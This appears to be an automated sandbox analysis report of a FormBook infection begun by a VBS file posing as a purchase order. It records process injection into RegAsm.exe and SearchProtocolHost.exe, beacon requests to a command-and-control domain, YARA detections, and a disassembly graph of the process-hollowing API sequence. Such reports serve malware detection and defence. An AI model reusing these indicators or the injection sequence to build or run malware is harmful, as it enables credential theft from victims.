                              Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to d
                              Dec 2, 2024 15:55:25.314733982 CET122INData Raw: 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64
                              Data Ascii: isable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.749989104.21.24.198805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:55:26.571739912 CET534OUTGET /jt56/?cNeT5P=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wbQxw9SoOMJyFS7aCodBcGMHsrkiHFt0aNasFqY1YB+AO+7j098ky2tOd&l0W=Yh8P HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.supernutra01.online
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:55:27.961287975 CET1236INHTTP/1.1 200 OK
                              Date: Mon, 02 Dec 2024 14:55:27 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                              Accept-Ranges: bytes
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXejZbvBvgEd9Yc%2Fpt69DvsiEFGLN2uK%2FOL%2BidHpFYAw95RqCVYjZt9%2FWgK%2BSgfmprJSpt%2B9A3fIat3WRk0lvmD67gaIZjxo0cc6qo0HdVQLiybaRMHyLZ5ygBGCMW%2FjyAHZBaE8B7qIlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ebc287528f10c7e-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                              Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::bef
                              Dec 2, 2024 15:55:27.961313009 CET1236INData Raw: 6f 72 65 2c 61 2c 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e
                              Data Ascii: ore,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#ff
                              Dec 2, 2024 15:55:27.961338043 CET1236INData Raw: 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 6f 6e 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20
                              Data Ascii: w-main .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;l
                              Dec 2, 2024 15:55:27.961352110 CET1236INData Raw: 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 38 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77
                              Data Ascii: _list{padding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bott
                              Dec 2, 2024 15:55:27.961374998 CET1236INData Raw: 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 30 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a
                              Data Ascii: lamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{paddin
                              Dec 2, 2024 15:55:27.961390018 CET1236INData Raw: 6c 63 28 2e 38 37 35 72 65 6d 20 2b 20 2e 31 38 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d
                              Data Ascii: lc(.875rem + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-
                              Dec 2, 2024 15:55:27.961407900 CET1236INData Raw: 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e
                              Data Ascii: 4146341vw ,1.875rem)}}@supports not (margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-col
                              Dec 2, 2024 15:55:27.961471081 CET1236INData Raw: 31 36 20 33 32 32 2e 35 30 31 20 32 30 33 2e 33 38 20 33 35 39 2e 34 34 36 20 32 32 31 2e 31 32 43 33 39 36 2e 33 39 32 20 32 33 38 2e 38 35 39 20 34 30 34 2e 37 32 38 20 32 39 38 2e 32 35 36 20 33 37 38 2e 30 36 37 20 33 35 33 2e 37 38 36 43 33
                              Data Ascii: 16 322.501 203.38 359.446 221.12C396.392 238.859 404.728 298.256 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="
                              Dec 2, 2024 15:55:27.961560965 CET1236INData Raw: 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75
                              Data Ascii: /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="90" result="effect1_foregroundBlur_2001_5" /></filter></defs></svg><h1 class="win
                              Dec 2, 2024 15:55:27.961575985 CET1236INData Raw: 22 3e 0a 09 09 09 09 09 09 09 3c 65 6c 6c 69 70 73 65 20 63 78 3d 22 31 31 32 2e 35 33 34 22 20 63 79 3d 22 31 33 34 2e 32 39 39 22 20 72 78 3d 22 31 31 32 2e 35 33 34 22 20 72 79 3d 22 31 33 34 2e 32 39 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22
                              Data Ascii: "><ellipse cx="112.534" cy="134.299" rx="112.534" ry="134.299" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 379.183 586.577)" fill="#15B1F9" /></g><g opacity="0.8" filter="url(#filter1_f_2001_10)"><path
                              Dec 2, 2024 15:55:27.969588041 CET197INData Raw: 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 39 30 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 31
                              Data Ascii: /><feGaussianBlur stdDeviation="90" result="effect1_foregroundBlur_2001_10" /></filter></defs></svg></div></section></main></div></body></html>0


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:09:53:16
                              Start date:02/12/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs"
                              Imagebase:0x7ff644c80000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:09:53:31
                              Start date:02/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe"
                              Imagebase:0xa50000
                              File size:396'288 bytes
                              MD5 hash:5E4094C909CCCBA80D844F553391F9F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:4
                              Start time:09:53:42
                              Start date:02/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0x940000
                              File size:65'440 bytes
                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:09:53:52
                              Start date:02/12/2024
                              Path:C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe"
                              Imagebase:0xf60000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:6
                              Start time:09:53:53
                              Start date:02/12/2024
                              Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                              Imagebase:0x690000
                              File size:340'992 bytes
                              MD5 hash:727FE964E574EEAF8917308FFF0880DE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              General

                              Target ID:9
                              Start time:09:54:06
                              Start date:02/12/2024
                              Path:C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe"
                              Imagebase:0xf60000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:11
                              Start time:09:54:18
                              Start date:02/12/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff722870000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:47.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:126
                                Total number of Limit Nodes:2
                                execution_graph 1925 1462af4 1926 1462b00 CreateProcessA 1925->1926 1928 1462e38 1926->1928 1775 1461ed0 1776 1461ef4 1775->1776 1777 1461fb9 1776->1777 1780 1462855 1776->1780 1800 1462441 1776->1800 1781 14624e1 1780->1781 1787 1462850 1781->1787 1820 14629c8 1781->1820 1824 14629d8 1781->1824 1782 14624f6 1828 1462fe0 1782->1828 1832 1462fd1 1782->1832 1783 14625ca 1836 14632df 1783->1836 1840 14632f0 1783->1840 1784 14627b0 1852 1463731 1784->1852 1858 1463740 1784->1858 1785 14627d1 1864 1463d70 1785->1864 1872 1463d60 1785->1872 1786 146264f 1844 14634c8 1786->1844 1848 14634b8 1786->1848 1787->1777 1801 1462483 1800->1801 1802 1462850 1801->1802 1816 14629c8 CreateProcessA 1801->1816 1817 14629d8 CreateProcessA 1801->1817 1802->1777 1802->1802 1803 14624f6 1810 1462fe0 Wow64SetThreadContext 1803->1810 1811 1462fd1 Wow64SetThreadContext 1803->1811 1804 14625ca 1818 14632f0 ReadProcessMemory 1804->1818 1819 14632df ReadProcessMemory 1804->1819 1805 146264f 1805->1805 1814 14634c8 VirtualAllocEx 1805->1814 1815 14634b8 VirtualAllocEx 1805->1815 1806 14627b0 1808 1463740 WriteProcessMemory 1806->1808 1809 1463731 WriteProcessMemory 1806->1809 1807 14627d1 1812 1463d60 3 API calls 1807->1812 1813 1463d70 3 API calls 1807->1813 1808->1807 1809->1807 1810->1804 1811->1804 1812->1802 1813->1802 1814->1806 1815->1806 1816->1803 1817->1803 1818->1805 1819->1805 1821 14629fc 1820->1821 1880 146076c 1821->1880 1825 14629fc 1824->1825 1826 146076c CreateProcessA 1825->1826 1827 1462a95 1826->1827 1827->1782 1830 1462ffc 1828->1830 1831 14630cf 1830->1831 1884 1460794 1830->1884 1831->1783 1833 1462fe0 1832->1833 1834 1460794 Wow64SetThreadContext 1833->1834 1835 14630cf 1833->1835 1834->1835 1835->1783 1837 1463317 1836->1837 1888 14607bc 1837->1888 1841 1463317 1840->1841 1842 14607bc ReadProcessMemory 1841->1842 1843 146336b 1842->1843 1843->1786 1845 14634ef 1844->1845 1892 14607d4 1845->1892 1847 146357c 1847->1784 1849 14634ef 1848->1849 1850 14607d4 VirtualAllocEx 1849->1850 1851 146357c 1850->1851 1851->1784 1853 1463770 1852->1853 1896 14607ec 1853->1896 1855 1463836 1856 1463bf1 1855->1856 1857 14607ec WriteProcessMemory 1855->1857 1856->1785 1857->1855 1859 1463770 1858->1859 1860 14607ec WriteProcessMemory 1859->1860 1863 1463836 1860->1863 1861 1463bf1 1861->1785 1862 14607ec WriteProcessMemory 1862->1863 1863->1861 1863->1862 1865 1463d9d 1864->1865 1866 14607ec WriteProcessMemory 1865->1866 1867 1463e49 1866->1867 1867->1867 1871 1463f7b 1867->1871 1900 1460804 1867->1900 1870 1464028 1870->1787 1904 146081c 1871->1904 1873 1463d9d 1872->1873 1874 14607ec WriteProcessMemory 1873->1874 1875 1463e49 1874->1875 1877 1460804 Wow64SetThreadContext 1875->1877 1879 1463f7b 1875->1879 1876 146081c ResumeThread 1878 1464028 1876->1878 1877->1879 1878->1787 1879->1876 1881 1462b00 CreateProcessA 1880->1881 1883 1462e38 1881->1883 1885 14631d0 Wow64SetThreadContext 1884->1885 1887 1463293 1885->1887 1887->1831 1889 1463398 ReadProcessMemory 1888->1889 1891 146336b 1889->1891 1891->1786 1893 1463620 VirtualAllocEx 1892->1893 1895 14636de 1893->1895 1895->1847 1897 1463c18 WriteProcessMemory 1896->1897 1899 1463cff 1897->1899 1899->1855 1901 14631d0 Wow64SetThreadContext 1900->1901 1903 1463293 1901->1903 1903->1871 1905 14640b8 ResumeThread 1904->1905 1907 1464147 1905->1907 1907->1870 1908 1463c10 1909 1463c68 WriteProcessMemory 1908->1909 1911 1463cff 1909->1911 1916 1461ec0 1917 1461ef4 1916->1917 1918 1461fb9 1917->1918 1919 1462855 7 API calls 1917->1919 1920 1462441 7 API calls 1917->1920 1919->1918 1920->1918 1929 1463390 1930 1463398 ReadProcessMemory 1929->1930 1932 146345e 1930->1932 1933 14640b0 1934 14640b8 ResumeThread 1933->1934 1936 1464147 1934->1936 1912 1463618 1913 1463620 VirtualAllocEx 1912->1913 1915 14636de 1913->1915 1921 14631c8 1922 146321d Wow64SetThreadContext 1921->1922 1924 1463293 1922->1924

                                Executed Functions

                                Function 01460D98 Relevance: .6, Instructions: 588COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8239c238b434e4f1e1106178513673af0aee106db576b677abade6a1dfc7ae95
                                • Instruction ID: ce948cb31a297cc27cdcd37bc02377c20b507b636602e1d14313e56dea24ba35
                                • Opcode Fuzzy Hash: 8239c238b434e4f1e1106178513673af0aee106db576b677abade6a1dfc7ae95
                                • Instruction Fuzzy Hash: 5B528378A00219CFDB64CF69D984B99BBF5FF49314F1481AAE909A7361D731AE81CF10
                                Function 01462AF4 Relevance: 1.8, APIs: 1, Instructions: 345processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 1462af4-1462ba3 3 1462c05-1462c30 0->3 4 1462ba5-1462bd5 0->4 7 1462c92-1462ceb 3->7 8 1462c32-1462c62 3->8 4->3 12 1462bd7-1462bdc 4->12 15 1462ced-1462d1a 7->15 16 1462d4a-1462e36 CreateProcessA 7->16 8->7 23 1462c64-1462c69 8->23 13 1462bde-1462be8 12->13 14 1462bff-1462c02 12->14 17 1462bec-1462bfb 13->17 18 1462bea 13->18 14->3 15->16 31 1462d1c-1462d21 15->31 39 1462e3f-1462f19 16->39 40 1462e38-1462e3e 16->40 17->17 20 1462bfd 17->20 18->17 20->14 24 1462c8c-1462c8f 23->24 25 1462c6b-1462c75 23->25 24->7 28 1462c77 25->28 29 1462c79-1462c88 25->29 28->29 29->29 30 1462c8a 29->30 30->24 33 1462d44-1462d47 31->33 34 1462d23-1462d2d 31->34 33->16 35 1462d31-1462d40 34->35 36 1462d2f 34->36 35->35 38 1462d42 35->38 36->35 38->33 51 1462f1b-1462f1f 39->51 52 1462f29-1462f2d 39->52 40->39 51->52 53 1462f21 51->53 54 1462f2f-1462f33 52->54 55 1462f3d-1462f41 52->55 53->52 54->55 56 1462f35 54->56 57 1462f43-1462f47 55->57 58 1462f51-1462f55 55->58 56->55 57->58 59 1462f49 57->59 60 1462f57-1462f80 58->60 61 1462f8b-1462f96 58->61 59->58 60->61 64 1462f97 61->64 64->64
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,00000000,00000000,03DB3588,03DB358C,01462A95,?,?,?), ref: 01462E23
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: a6af18bb4dbfb639d167b5d38851c9c284aa2b54b291eb797043ed7cca14ef28
                                • Instruction ID: 73323d377b7104fd58f09d8253115f8b2fd0fc9bdf0818f522e9084cf6f05c8b
                                • Opcode Fuzzy Hash: a6af18bb4dbfb639d167b5d38851c9c284aa2b54b291eb797043ed7cca14ef28
                                • Instruction Fuzzy Hash: 1DD14A70D002299FDB24CFA8C841BEEBBF5FB49304F0091AAD559B7250DBB49A85CF95
                                Function 0146076C Relevance: 1.8, APIs: 1, Instructions: 341processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 66 146076c-1462ba3 69 1462c05-1462c30 66->69 70 1462ba5-1462bd5 66->70 73 1462c92-1462ceb 69->73 74 1462c32-1462c62 69->74 70->69 78 1462bd7-1462bdc 70->78 81 1462ced-1462d1a 73->81 82 1462d4a-1462e36 CreateProcessA 73->82 74->73 89 1462c64-1462c69 74->89 79 1462bde-1462be8 78->79 80 1462bff-1462c02 78->80 83 1462bec-1462bfb 79->83 84 1462bea 79->84 80->69 81->82 97 1462d1c-1462d21 81->97 105 1462e3f-1462f19 82->105 106 1462e38-1462e3e 82->106 83->83 86 1462bfd 83->86 84->83 86->80 90 1462c8c-1462c8f 89->90 91 1462c6b-1462c75 89->91 90->73 94 1462c77 91->94 95 1462c79-1462c88 91->95 94->95 95->95 96 1462c8a 95->96 96->90 99 1462d44-1462d47 97->99 100 1462d23-1462d2d 97->100 99->82 101 1462d31-1462d40 100->101 102 1462d2f 100->102 101->101 104 1462d42 101->104 102->101 104->99 117 1462f1b-1462f1f 105->117 118 1462f29-1462f2d 105->118 106->105 117->118 119 1462f21 117->119 120 1462f2f-1462f33 118->120 121 1462f3d-1462f41 118->121 119->118 120->121 122 1462f35 120->122 123 1462f43-1462f47 121->123 124 1462f51-1462f55 121->124 122->121 123->124 125 1462f49 123->125 126 1462f57-1462f80 124->126 127 1462f8b-1462f96 124->127 125->124 126->127 130 1462f97 127->130 130->130
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,00000000,00000000,03DB3588,03DB358C,01462A95,?,?,?), ref: 01462E23
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 9d731fc8166d7fd7b1f70969464794ef4b4bc6444e42ee94c0bc894e3b4c90e8
                                • Instruction ID: 5524f52a26d2818008981e93447439423757761aed5198cfd226e5f42853e578
                                • Opcode Fuzzy Hash: 9d731fc8166d7fd7b1f70969464794ef4b4bc6444e42ee94c0bc894e3b4c90e8
                                • Instruction Fuzzy Hash: 8BD14A70D002299FDB24DFA8C841BEEBBF5FB09304F0091AAD559B7250DBB49A85CF95
                                Function 014607EC Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
